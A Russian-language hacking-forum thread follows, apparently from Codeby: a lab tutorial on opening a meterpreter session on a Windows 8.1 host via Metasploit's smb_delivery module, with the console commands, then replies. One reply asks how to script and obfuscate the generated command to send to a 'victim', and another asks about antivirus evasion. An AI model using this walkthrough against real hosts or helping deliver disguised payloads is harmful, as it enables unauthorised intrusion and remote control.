Статья Взлом удаленного хоста (SMB Delivery Exploit)

Всем привет! В этой небольшой статье я хочу показать очередной способ получения сессии meterpreter посредством использования Metasploit Framework, а в частности эксплоита, который носит название SMB Delivery Exploit.

upload_2016-11-1_22-52-26.png


В роли атакующей системы Kali Linux 2016.2 с адресом в локальной сети 192.168.0.102 и целевой хост – Windows 8.1. с адресом в локальной сети 192.168.0.103.

Откроем терминал и запустим Metasploit Framework:

> msfconsole

В консоли фреймворка пишем:

> use exploit/windows/smb/smb_delivery

> set srvport 4444

> set srvhost 192.168.0.102

> exploit

upload_2016-11-1_22-53-15.png


Теперь, как указывает эксплойт, нам необходимо запустить сгенерированную им команду в командной строке целевого хоста:

upload_2016-11-1_22-53-38.png


После успешной отработки команды в консоли Linux видим формирование сессии meterpreter:

upload_2016-11-1_22-53-59.png


Жмем Ctrl+C, и смотрим информацию о текущих сессиях:

> sessions –i

И подключаемся к открытой сессии под номером 1:

> sessions –I 1

upload_2016-11-1_22-54-27.png


В диспетчере задач Windows созданный процесс выглядит так:

upload_2016-11-1_22-55-4.png


Снимаем задачу и сессия погибает:

upload_2016-11-1_22-55-21.png


На этом собственно все. Спасибо за внимание.
 
И с другой стороны Enima здесь разве речь шла о деньгах?
Ты по ходу не в те берега загребла...или загреб как тебе будет удобней!
 
Что за статья не полное описание дальше что нужно? зачем писать столько статей где нет полной иструкции?
 
  • Нравится
Реакции: -=S_U_N_Y=-
Что за статья не полное описание дальше что нужно? зачем писать столько статей где нет полной иструкции?
Итог, получение сессии meterpreter, что еще нужно? Вы можете вменяемо выражать мысли?
 
Видео твое чего здесь не понятно, а то с других форумов темы на создаешь с разными диструбутивами где программы должным образом не работают приходится задавать кучу вопросов у кого работает у кого нет надо же еще саму программу отредактировать и откомпилировать чтоб она работала.
 
Видео твое чего здесь не понятно, а то с других форумов темы на создаешь с разными диструбутивами где программы должным образом не работают приходится задавать кучу вопросов у кого работает у кого нет надо же еще саму программу отредактировать и откомпилировать чтоб она работала.
Что в этой теме непонятного? Это SMB Delivery Exploit - для тебя поясню, это такой эксплоит, в Metasploit Framework, ему уже лет 100 наверное, я показал как он работает, на своих компьютерах. Какие левые форумы?))
Когда пытаешься что-то на практике сделать, попробуй использовать мозг.
 
Видео твое чего здесь не понятно, а то с других форумов темы на создаешь с разными диструбутивами где программы должным образом не работают приходится задавать кучу вопросов у кого работает у кого нет надо же еще саму программу отредактировать и откомпилировать чтоб она работала.
Следующие посты не по теме буду удалять.
 
для тех кто не в теме ваше все это тетрис.вам vander спасибо.и как говорят пиши все что знаешь пиши)))
 
  • Нравится
Реакции: Vander
lamerhacker ...

Так всё-таки: "ламер" или "хакер" ... или просто "лузер"? :D
 
  • Нравится
Реакции: Mixa
Всем привет! В этой небольшой статье я хочу показать очередной способ получения сессии meterpreter посредством использования Metasploit Framework, а в частности эксплоита, который носит название SMB Delivery Exploit.

Посмотреть вложение 7329

В роли атакующей системы Kali Linux 2016.2 с адресом в локальной сети 192.168.0.102 и целевой хост – Windows 8.1. с адресом в локальной сети 192.168.0.103.

Откроем терминал и запустим Metasploit Framework:

> msfconsole

В консоли фреймворка пишем:

> use exploit/windows/smb/smb_delivery

> set srvport 4444

> set srvhost 192.168.0.102

> exploit

Посмотреть вложение 7330

Теперь, как указывает эксплойт, нам необходимо запустить сгенерированную им команду в командной строке целевого хоста:

Посмотреть вложение 7331

После успешной отработки команды в консоли Linux видим формирование сессии meterpreter:

Посмотреть вложение 7332

Жмем Ctrl+C, и смотрим информацию о текущих сессиях:

> sessions –i

И подключаемся к открытой сессии под номером 1:

> sessions –I 1

Посмотреть вложение 7333

В диспетчере задач Windows созданный процесс выглядит так:

Посмотреть вложение 7334

Снимаем задачу и сессия погибает:

Посмотреть вложение 7335

На этом собственно все. Спасибо за внимание.
Можешь подсказать пожалуйста
К примеру хочу эту команду сделать в виде скрипта, закриптовать и кинуть жертве, чтобы он все сделал сам так сказать)
Дак вот как прописать скрипт?
 
акак он дружит с антивирусами?
 
Можешь подсказать пожалуйста
К примеру хочу эту команду сделать в виде скрипта, закриптовать и кинуть жертве, чтобы он все сделал сам так сказать)
Дак вот как прописать скрипт?
Python в помощь Вам
[doublepost=1483982815,1483982740][/doublepost]
акак он дружит с антивирусами?
Все зависит от конкретной ситуации, можете описать свою
 
у меня всё остановилось после получения команды. а вот выполнить её на атакуемой машине не получается, т.к. ругается на неверный сетевой путь. в чем может быть проблема? пинги то идут..
 
Тоже самое. На целевой машине (win7) пишет, что неверный сетевой путь. Пинги идут. В чем может быть проблема?
 
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab

Похожие темы

🚀 Первый раз на Codeby?
Гайд для новичков: что делать в первые 15 минут, ключевые разделы, правила
Начать здесь →
🔴 Свежие CVE, 0-day и инциденты
То, о чём ChatGPT ещё не знает — обсуждаем в реальном времени
Threat Intel →
💼 Вакансии и заказы в ИБ
Pentest, SOC, DevSecOps, bug bounty — работа и проекты от проверенных компаний
Карьера в ИБ →

HackerLab